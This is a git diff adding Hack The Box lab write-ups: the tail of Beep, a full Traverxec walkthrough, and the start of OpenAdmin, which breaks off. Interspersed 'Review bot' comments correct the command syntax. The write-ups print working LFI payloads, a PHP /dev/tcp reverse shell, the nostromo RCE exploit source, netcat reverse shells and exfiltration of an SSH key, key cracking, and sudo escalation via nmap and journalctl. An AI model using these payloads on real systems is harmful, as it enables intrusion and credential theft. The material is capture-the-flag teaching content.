+ vTiger CRM 5.0.4 - Local File Inclusion | exploits/php/webapps/16280.py
+ vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities | exploits/php/webapps/32307.txt
+ vTiger CRM 5.0.4 - Remote Code Execution / Cross-Site Request Forgery / Lo | exploits/php/webapps/9450.txt
+ **vTiger CRM 5.1.0 - Local File Inclusion | exploits/php/webapps/18770.txt**
+ vTiger CRM 5.2 - 'onlyforuser' SQL Injection | exploits/php/webapps/36208.txt
+ vTiger CRM 5.2.1 - 'PHPrint.php' Multiple Cross-Site Scripting Vulnerabili | exploits/php/webapps/36204.txt
+ vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabiliti | exploits/php/webapps/36203.txt
+ vTiger CRM 5.2.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabiliti | exploits/php/webapps/36255.txt
+ vTiger CRM 5.2.1 - 'sortfieldsjson.php' Local File Inclusion | exploits/php/webapps/35574.txt
+ vTiger CRM 5.2.1 - 'vtigerservice.php' Cross-Site Scripting | exploits/php/webapps/35577.txt
+ vTiger CRM 5.3.0 5.4.0 - (Authenticated) Remote Code Execution (Metasploit | exploits/php/remote/29319.rb
+ vTiger CRM 5.4.0 - 'index.php?onlyforuser' SQL Injection | exploits/php/webapps/28409.txt
+ vTiger CRM 5.4.0 SOAP - AddEmailAttachment Arbitrary File Upload (Metasplo | exploits/php/remote/30787.rb
+ vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities | exploits/php/webapps/27279.txt
+ vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion | exploits/php/webapps/32213.txt
+ vTiger CRM 6.3.0 - (Authenticated) Remote Code Execution | exploits/php/webapps/38345.txt
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+VtigerCRM seems to be vulnerable to Local File Inclusion (LFI), let's take a closer look onto [exploit-db](https://www.exploit-db.com/exploits/18770). According to the article, the CVE 2012-4867 would allow us to Include Local Files due to a vulnerable php script named **sortfieldsjson.php** Let's test it with the following URL our web browser :
+
+
+ https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00
+
+
+
+
+The LFI is successful, and We now have 2 usernames to work with : **fanis** and **root** We will now try out to see if we can get the user flag located in **/home/fanis** / Just for this example we'll print out the content of the page from within the terminal using the wget command using the following syntax : **wget -O - URL --no-check-certificate**
+
+
+ λ nihilist [~] → wget -O - https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php\?module_name\=../../../../../../../../home/fanis/user.txt%00 --no-check-certificate
+
+ --2019-11-09 15:00:39-- https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../home/fanis/user.txt%00
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Connecting to 10.10.10.7:443... connected.
+ WARNING: The certificate of ‘10.10.10.7’ is not trusted.
+ WARNING: The certificate of ‘10.10.10.7’ doesn't have a known issuer.
+ WARNING: The certificate of ‘10.10.10.7’ has expired.
+ The certificate has expired
+ The certificate's owner does not match hostname ‘10.10.10.7’
+ HTTP request sent, awaiting response... 200 OK
+ Length: 33 [text/html]
+ Saving to: ‘STDOUT’
+
+ - 0%[ ] 0 --.-KB/s
+ **aeXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+ - 100%[==============================================>] 33 --.-KB/s in 0s
+
+ 2019-11-09 15:00:40 (286 KB/s) - written to stdout [33/33]
+
+
+We now have the user flag, but we are not able to get the root flag this way, we need to find a way to gain elevated privilege access.
+
+## **Part 3 : Getting Root Access**
+
+In order to gain our elevated privilege access, we need to look at the results of our previous **searchsploit** command with the elastix keyword. There seems to be yet another Local File Inclusion exploit that we could potentially use taking a closer look at the [exploit-db article](https://www.exploit-db.com/exploits/37637) : We see that there could be a LFI vulnerability contained within a php script named **"graph.php"**. Let's test if it is working here aswell.
+
+We will use the curl command for this example, just to show off yet another syntax we could use. **curl -vs URL -k**
+
+the output is preety massive so i will highlight the important parts :
+
+
+ λ nihilist [~] → curl -vs https://10.10.10.7/vtigercrm/graph.php\?current_language\=../../../../../../../..//etc/amportal.conf%00\&module;\=Accounts\&action; 2>&1 -k
+
+ [...]
+
+ # FreePBX Database configuration
+ # AMPDBHOST: Hostname where the FreePBX database resides
+ # AMPDBENGINE: Engine hosting the FreePBX database (e.g. mysql)
+ # AMPDBNAME: Name of the FreePBX database (e.g. asterisk)
+ # AMPDBUSER: Username used to connect to the FreePBX database
+ # AMPDBPASS: Password for AMPDBUSER (above)
+ # AMPENGINE: Telephony backend engine (e.g. asterisk)
+ # AMPMGRUSER: Username to access the Asterisk Manager Interface
+ # AMPMGRPASS: Password for AMPMGRUSER
+ #
+ AMPDBHOST=localhost
+ AMPDBENGINE=mysql
+ # AMPDBNAME=asterisk
+ AMPDBUSER=asteriskuser
+ # AMPDBPASS=amp109
+ **AMPDBPASS=jEhdIekWmdjE**
+ AMPENGINE=asterisk
+ **AMPMGRUSER=admin**
+ #AMPMGRPASS=amp111
+ AMPMGRPASS=jEhdIekWmdjE
+
+ [...]
+
+
+
+The second LFI is successful, we now have credentials that we can use on the vtigercrm login page. **admin:jEhdIekWmdjE**
+
+Once we are logged in , we simply need to browse into **Settings > Company Details** and inject our **reverse-shell.php** disguised as **reverse-shell.php.jpg**
+
+
+ λ nihilist [~/_HTB/Beep] → nano nihilist.php.jpg
+
+ <**?php exec("/bin/bash -c 'bash -i > & /dev/tcp/10.10.14.48/1234 0>&1'"); **?>
+
+ λ nihilist [~/_HTB/Beep] → nc -lvnp 1234
+
+
+
+
+at this point, all that is left to do is to upload our reverse shell, to browse to where the reverse shell is located, and to recieve the connection back to our Terminal running the netcat command used above.
+
+We will browse at this address : **http://10.10.10.7/vtigercrm/test/logo/nihilist.php.jpg**
+
+
+ λ nihilist [~/_HTB/Beep] → nc -lvnp 1234
+ Connection from 10.10.10.7:46306
+ bash: no job control in this shell
+
+ bash-3.2$ whoami
+ asterisk
+
+ bash-3.2$ uname -a
+ Linux beep 2.6.18-238.12.1.el5 #1 SMP Tue May 31 13:23:01 EDT 2011 i686 athlon i386 GNU/Linux
+
+ bash-3.2$ sudo -l
+ Matching Defaults entries for asterisk on this host:
+ env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
+ LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
+ LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
+ LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
+ XAUTHORITY"
+
+ User asterisk may run the following commands on this host:
+ (root) NOPASSWD: /sbin/shutdown
+ **(root) NOPASSWD: /usr/bin/nmap**
+ (root) NOPASSWD: /usr/bin/yum
+ (root) NOPASSWD: /bin/touch
+ (root) NOPASSWD: /bin/chmod
+ (root) NOPASSWD: /bin/chown
+ (root) NOPASSWD: /sbin/service
+ (root) NOPASSWD: /sbin/init
+ (root) NOPASSWD: /usr/sbin/postmap
+ (root) NOPASSWD: /usr/sbin/postfix
+ (root) NOPASSWD: /usr/sbin/saslpasswd2
+ (root) NOPASSWD: /usr/sbin/hardware_detector
+ (root) NOPASSWD: /sbin/chkconfig
+ (root) NOPASSWD: /usr/sbin/elastix-helper
+
+
+
+We now have a reverse shell as asterisk, but we need to escalate privileges. We can use the nmap command which can be run as root for example.
+
+
+ bash-3.2$ sudo nmap --interactive
+
+ Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
+ Welcome to Interactive Mode -- press h for help
+ nmap> !sh
+
+ whoami
+ root
+
+ cat /root/root.txt
+ **d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX**
+
+
+
+And that's it ! we finally got the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
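Review bot: the reverse-shell one-liner in `nihilist.php.jpg` is not valid bash as written: `bash -i > & /dev/tcp/10.10.14.48/1234 0>&1` has a space inside the `>&` operator, so bash sees a bare `&` after `>` and reports a syntax error instead of redirecting stdout and stderr to the socket; it should read `bash -i >& /dev/tcp/10.10.14.48/1234 0>&1`. The surrounding `<**?php ... **?>` and the `**AMPDBPASS=jEhdIekWmdjE**` / `**AMPMGRUSER=admin**` / `**(root) NOPASSWD: /usr/bin/nmap**` lines sit inside indented code blocks, where markdown renders the `**` literally rather than as emphasis; either drop the markers or move the highlight into the prose. The quoted `curl` command also carries stray semicolons in `\&module;\=Accounts\&action;`, which looks like HTML-entity residue (`&module=` / `&action=`) and would not send the request the text describes. Minor: "recieve" should be "receive".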
diff --git a/Easy/40.md b/Easy/40.md
new file mode 100644
index 0000000..87ba30f
--- /dev/null
+++ b/Easy/40.md
@@ -0,0 +1,524 @@
+# Traverxec Writeup
+
+
+
+## Introduction :
+
+Traverxec is an easy linux box released back in November 2019.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [Nextcloud/blog]
+ → sudo nmap -vvv -p- 10.10.10.165 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ [sudo] password for nothing:
+ Discovered open port 80/tcp on 10.10.10.165
+ Discovered open port 22/tcp on 10.10.10.165
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [Nextcloud/blog]
+ → nmap -sCV -p80,22 10.10.10.165
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-25 11:35 CEST
+ Nmap scan report for 10.10.10.165
+ Host is up (0.034s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
+ | ssh-hostkey:
+ | 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
+ | 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
+ |_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
+ 80/tcp open http nostromo 1.9.6
+ |_http-server-header: nostromo 1.9.6
+ |_http-title: TRAVERXEC
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 8.07 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 running nostromo 1.9.6:
+
+
+
+You can run the scans you want on this webserver, you won't find much. But we do know that this is nostromo 1.9.6 so lets see if there are any CVEs:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [Nextcloud/blog]
+ → searchsploit nostromo 1.9
+ --------------------------------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ --------------------------------------------------------------------------------- ---------------------------------
+ nostromo 1.9.6 - Remote Code Execution | multiple/remote/47837.py
+ nostromo nhttpd 1.9.3 - Directory Traversal Remote Command Execution | linux/remote/35466.sh
+ --------------------------------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+
+And indeed this is an incredible coincidence that this nostromo version has a RCE vulnerability, so let's use it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → cp $(locate 47837.py) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → vim 47837.py
+
+
+
+Looking at it in detail:
+
+
+ # Exploit Title: nostromo 1.9.6 - Remote Code Execution
+ # Date: 2019-12-31
+ # Exploit Author: Kr0ff
+ # Vendor Homepage:
+ # Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
+ # Version: 1.9.6
+ # Tested on: Debian
+ # CVE : CVE-2019-16278
+
+ #cve2019_16278.py
+
+ #!/usr/bin/env python
+
+ import sys
+ import socket
+
+ art = """
+
+ _____-2019-16278
+ _____ _______ ______ _____\ \
+ _____\ \_\ | | | / / | |
+ / /| || / / /|/ / /___/|
+ / / /____/||\ \ \ |/| |__ |___|/
+ | | |____|/ \ \ \ | | | \
+ | | _____ \| \| | | __/ __
+ |\ \|\ \ |\ /| |\ \ / \
+ | \_____\| | | \_______/ | | \____\/ |
+ | | /____/| \ | | / | | |____/|
+ \|_____| || \|_____|/ \|____| | |
+ |____|/ |___|/
+
+
+
+ """
+
+ help_menu = '\r\nUsage: cve2019-16278.py <****Target_IP> <****Target_Port> <****Command>'
+
+ def connect(soc):
+ response = ""
+ try:
+ while True:
+ connection = soc.recv(1024)
+ if len(connection) == 0:
+ break
+ response += connection
+ except:
+ pass
+ return response
+
+ def cve(target, port, cmd):
+ soc = socket.socket()
+ soc.connect((target, int(port)))
+ payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2> &1'.format(cmd)
+ soc.send(payload)
+ receive = connect(soc)
+ print(receive)
+
+ if __name__ == "__main__":
+
+ print(art)
+
+ try:
+ target = sys.argv[1]
+ port = sys.argv[2]
+ cmd = sys.argv[3]
+
+ cve(target, port, cmd)
+
+ except IndexError:
+ print(help_menu)
+
+
+
+This is a very simple python script, which sends a POST request to the ip and port pair we give it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → python 47837.py 10.10.10.165 80 id
+
+
+ _____-2019-16278
+ _____ _______ ______ _____\ \
+ _____\ \_\ | | | / / | |
+ / /| || / / /|/ / /___/|
+ / / /____/||\ \ \ |/| |__ |___|/
+ | | |____|/ \ \ \ | | | \
+ | | _____ \| \| | | __/ __
+ |\ \|\ \ |\ /| |\ \ / \
+ | \_____\| | | \_______/ | | \____\/ |
+ | | /____/| \ | | / | | |____/|
+ \|_____| || \|_____|/ \|____| | |
+ |____|/ |___|/
+
+
+
+
+ HTTP/1.1 200 OK
+ Date: Tue, 25 May 2021 15:48:12 GMT
+ Server: nostromo 1.9.6
+ Connection: close
+
+
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+
+Indeed we get remote code execution as the www-data user, so we can get a reverse shell as follows:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traverxec]
+ → python 47837.py 10.10.10.165 80 "nc -e bash 10.10.14.13 9001"
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.165] 54374
+
+ id
+ uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+
+Obviously this is a very limited shell, so let's upgrade it to a fully interactive shell, first we spawn a tty using python's pty module:
+
+
+ which python
+ /usr/bin/python
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@traverxec:/usr/bin$
+
+ CTRL+Z
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → stty raw echo ; fg
+
+ [1] + 3599725 continued nc -lvnp 9001
+ export TERM=screen-256color
+ www-data@traverxec:/usr/bin$ export SHELL=bash
+ www-data@traverxec:/usr/bin$ stty rows 40 columns 125
+ www-data@traverxec:/usr/bin$ reset
+
+
+
+And there you go ! We managed to get a fully interactive reverse shell:
+
+
+ www-data@traverxec:/usr/bin$ stty -a | grep rows
+ speed 38400 baud; rows 40; columns 125; line = 0;
+
+ www-data@traverxec:/usr/bin$ echo $TERM
+ screen-256color
+
+ www-data@traverxec:/usr/bin$ echo $SHELL
+ bash
+
+ www-data@traverxec:/usr/bin$ ls
+ Display all 666 possibilities? (y or n)
+
+
+Now from there we need to find a way to privesc:
+
+
+ www-data@traverxec:/usr/bin$ ls /home
+ david
+
+ www-data@traverxec:/usr/bin$ ls /home/david/user.txt
+ /home/david/user.txt
+
+ www-data@traverxec:/usr/bin$ ls /home/david/user.txt -lash
+ 4.0K -r--r----- 1 root david 33 Oct 25 2019 /home/david/user.txt
+
+
+
+We're going to attempt to privesc to the david user, so first let's enumerate the box using LinPEAS.sh:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → cp $(locate linpeas.sh) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → ls -lash linpeas.sh
+ 336K -rwxr-xr-x 1 nothing nothing 334K May 25 17:50 linpeas.sh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/29 ] [~/HTB/Traverxec]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+
+Now download it onto the box:
+
+
+ www-data@traverxec:/dev/shm$ which wget ; which curl
+ /usr/bin/wget
+
+ www-data@traverxec:/dev/shm$ which wget ; which curl
+ /usr/bin/wget
+ www-data@traverxec:/dev/shm$ wget http://10.10.14.13:9090/linpeas.sh -O /dev/shm/peas.sh
+ --2021-05-25 11:59:40-- http://10.10.14.13:9090/linpeas.sh
+ Connecting to 10.10.14.13:9090... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 341863 (334K) [text/x-sh]
+ Saving to: '/dev/shm/peas.sh'
+
+ /dev/shm/peas.sh 100%[====================================================>] 333.85K 690KB/s in 0.5s
+
+ 2021-05-25 11:59:41 (690 KB/s) - '/dev/shm/peas.sh' saved [341863/341863]
+
+ www-data@traverxec:/dev/shm$ chmod +x peas.sh
+ www-data@traverxec:/dev/shm$ ./peas.sh
+
+
+
+Here i uploaded the script to **/dev/shm** , which is basically an alternative to the **/tmp** directory.
+
+ 
+
+And indeed we are hinted towards the david user that seems to be part of quite a few groups, let's take a look at his home directory:
+
+
+ www-data@traverxec:/home/david$ cd public_www
+
+ www-data@traverxec:/home/david/public_www$ ls
+ index.html protected-file-area
+
+ www-data@traverxec:/home/david/public_www$ ls -lash
+ total 16K
+ 4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 .
+ 4.0K drwx--x--x 5 david david 4.0K Oct 25 2019 ..
+ 4.0K -rw-r--r-- 1 david david 402 Oct 25 2019 index.html
+ 4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 protected-file-area
+
+ www-data@traverxec:/home/david/public_www$ cat protected-file-area/
+ .htaccess backup-ssh-identity-files.tgz
+
+ www-data@traverxec:/home/david/public_www$ cat protected-file-area/.htaccess
+ realm David's Protected File Area. Keep out!
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ file backup-ssh-identity-files.tgz
+ backup-ssh-identity-files.tgz: gzip compressed data, last modified: Fri Oct 25 21:02:59 2019, from Unix, original size 10240
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ md5sum backup-ssh-identity-files.tgz
+ 084883c47fec5b1385b50f226db8175f backup-ssh-identity-files.tgz
+
+
+
+So here we seem to have a gzip archive called ssh backups, let's transfer it back to our local machine:
+
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ which nc
+ /usr/bin/nc
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ ls -lash
+ total 16K
+ 4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 .
+ 4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 ..
+ 4.0K -rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess
+ 4.0K -rw-r--r-- 1 david david 1.9K Oct 25 2019 backup-ssh-identity-files.tgz
+
+
+
+Luckily for us, netcat is on the machine, so this will be easy to transfer the backup file:
+
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ md5sum backup-ssh-identity-files.tgz
+ 084883c47fec5b1385b50f226db8175f backup-ssh-identity-files.tgz
+
+ www-data@traverxec:/home/david/public_www/protected-file-area$ cat backup-ssh-identity-files.tgz | nc 10.10.14.13 9002
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → nc -lvnp 9002 > backup.tgz
+ listening on [any] 9002 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.165] 54580
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → md5sum backup.tgz
+ 084883c47fec5b1385b50f226db8175f backup.tgz
+
+
+
+And once the transfer is done, we see that both files have the same m4d5 hash, so we know that the transfer is complete, both files are the same. So let's extract it and make use of the ssh keys in there:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → tar -xvf backup.tgz
+ home/david/.ssh/
+ home/david/.ssh/authorized_keys
+ home/david/.ssh/id_rsa
+ home/david/.ssh/id_rsa.pub
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → chmod 600 home/david/.ssh/id_rsa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → ssh david@10.10.10.165 -i home/david/.ssh/id_rsa
+ The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
+ ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
+ Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
+ Warning: Permanently added '10.10.10.165' (ECDSA) to the list of known hosts.
+ Enter passphrase for key 'home/david/.ssh/id_rsa':
+
+
+
+However not so fast! David's private key is encrypted with a password, so let's use john to crack it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [~/HTB/Traverxec]
+ → cd home/david/.ssh
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → locate ssh2john.py
+ /usr/share/john/ssh2john.py
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → /usr/share/john/ssh2john.py id_rsa > hash.txt
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → john -w=/usr/share/wordlists/rockyou.txt hash.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
+ Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
+ Cost 2 (iteration count) is 1 for all loaded hashes
+ Will run 4 OpenMP threads
+ Note: This format may emit false positives, so it will keep trying even after
+ finding a possible candidate.
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ hunter (id_rsa)
+
+
+And we now have david's password! so let's login using his ssh key:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/36 ] [home/david/.ssh]
+ → ssh david@10.10.10.165 -i id_rsa
+ Enter passphrase for key 'id_rsa':
+ Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
+ david@traverxec:~$ id
+ uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
+ david@traverxec:~$ cat user.txt
+ 7dXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it, we managed to get the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc from the david user to the root user,
+
+
+ david@traverxec:~$ ls -lash
+ total 36K
+ 4.0K drwx--x--x 5 david david 4.0K Oct 25 2019 .
+ 4.0K drwxr-xr-x 3 root root 4.0K Oct 25 2019 ..
+ 0 lrwxrwxrwx 1 root root 9 Oct 25 2019 .bash_history -> /dev/null
+ 4.0K -rw-r--r-- 1 david david 220 Oct 25 2019 .bash_logout
+ 4.0K -rw-r--r-- 1 david david 3.5K Oct 25 2019 .bashrc
+ 4.0K drwx------ 2 david david 4.0K Oct 25 2019 bin
+ 4.0K -rw-r--r-- 1 david david 807 Oct 25 2019 .profile
+ 4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 public_www
+ 4.0K drwx------ 2 david david 4.0K Oct 25 2019 .ssh
+ 4.0K -r--r----- 1 root david 33 Oct 25 2019 user.txt
+
+ david@traverxec:~$ ls -lash bin/server-stats.*
+ 4.0K -r-------- 1 david david 802 Oct 25 2019 bin/server-stats.head
+ 4.0K -rwx------ 1 david david 363 Oct 25 2019 bin/server-stats.sh
+
+ david@traverxec:~$ cat bin/server-stats.sh
+ #!/bin/bash
+
+ cat /home/david/bin/server-stats.head
+ echo "Load: `/usr/bin/uptime`"
+ echo " "
+ echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
+ echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
+ echo " "
+ echo "Last 5 journal log lines:"
+ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
+
+
+Looking in the bin directory we see a bashscript that seems to do something interesting, it runs sudo journalctl, let's run it to see what it does:
+
+
+ david@traverxec:~/bin$ ./server-stats.sh
+ .----.
+ .---------. | == |
+ Webserver Statistics and Data |.-"""""-.| |----|
+ Collection Script || || | == |
+ (c) David, 2019 || || |----|
+ |'-.....-'| |::::|
+ '"")---(""' |___.|
+ /:::::::::::\" "
+ /:::=======:::\
+ jgs '"""""""""""""'
+
+ Load: 12:50:42 up 7:14, 1 user, load average: 0.00, 0.00, 0.00
+
+ Open nhttpd sockets: 1
+ Files in the docroot: 117
+
+ Last 5 journal log lines:
+ -- Logs begin at Tue 2021-05-25 05:35:56 EDT, end at Tue 2021-05-25 12:50:42 EDT. --
+ May 25 12:01:12 traverxec sudo[8197]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/0 ruser=www-data rhost= user=www-data
+ May 25 12:01:15 traverxec sudo[8197]: pam_unix(sudo:auth): conversation failed
+ May 25 12:01:15 traverxec sudo[8197]: pam_unix(sudo:auth): auth could not identify password for [www-data]
+ May 25 12:01:15 traverxec sudo[8197]: www-data : command not allowed ; TTY=pts/0 ; PWD=/dev/shm ; USER=root ; COMMAND=list
+ May 25 12:01:15 traverxec nologin[8253]: Attempted login by UNKNOWN on UNKNOWN
+
+
+
+Basically the script returns the last 5 lines of the nostromo service logs using journalctl. So we can exploit it because journalctl invokes the default pager, which is likely to be the **less** utility. Therefore it is also possible to exploit this by running the last command like so:
+
+
+ #BEFORE
+ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
+
+ #AFTER
+ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
+
+
+after running it we prefix commands with the **!** character, to run **/bin/sh**
+
+The trick here to trigger the less command is to shrink your terminal to just a few lines, and you will be able to spawn the root shell:
+
+
+ david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
+ -- Logs begin at Tue 2021-05-25 05:35:56 EDT, end at Tue 2021-05-25 12:59:28 EDT. --
+ !/bin/sh
+ # id
+ uid=0(root) gid=0(root) groups=0(root)
+ # cat /root/root.txt
+ 9aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it! We managed to get a root shell and print the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
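Review bot: the shell-upgrade step is wrong as quoted: `stty raw echo ; fg` leaves local echo enabled (the flag is `-echo`), so every keystroke is printed twice once the session is foregrounded; it should be `stty raw -echo ; fg`, as the OpenAdmin writeup later in this patch has it. The pasted 47837.py source is also garbled in two places that would stop it running as shown: the usage string reads `<****Target_IP> <****Target_Port> <****Command>` (markdown-escaping residue for `<Target_IP>` etc.), and the payload ends in `{} 2> &1`, where the space inside `2>&1` makes the injected shell line a syntax error rather than a stderr redirect. In the prose, "m4d5 hash" should be "md5 hash", and the Part 3 opener "Now in order to privesc from the david user to the root user," is a sentence fragment that needs its second half (for example, "we start by looking around david's home directory:").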
diff --git a/Easy/41.md b/Easy/41.md
new file mode 100644
index 0000000..f450297
--- /dev/null
+++ b/Easy/41.md
@@ -0,0 +1,756 @@
+# OpenAdmin Writeup
+
+
+
+## Introduction :
+
+OpenAdmin is an easy Linux box released back in january 2020.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.0.14.13/16 ] [ /dev/pts/1 ] [~/HTB]
+ → nmap -sCV 10.10.10.171
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 21:20 CEST
+ Nmap scan report for 10.10.10.171
+ Host is up (0.039s latency).
+ Not shown: 998 closed ports
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
+ | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
+ |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
+ 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
+ |_http-server-header: Apache/2.4.29 (Ubuntu)
+ |_http-title: Apache2 Ubuntu Default Page: It works
+ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 9.36 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+For this box we're going to enumerate port 80 using a directory enumeration tool written in go called ffuf with one of the wordlists from seclists:
+
+
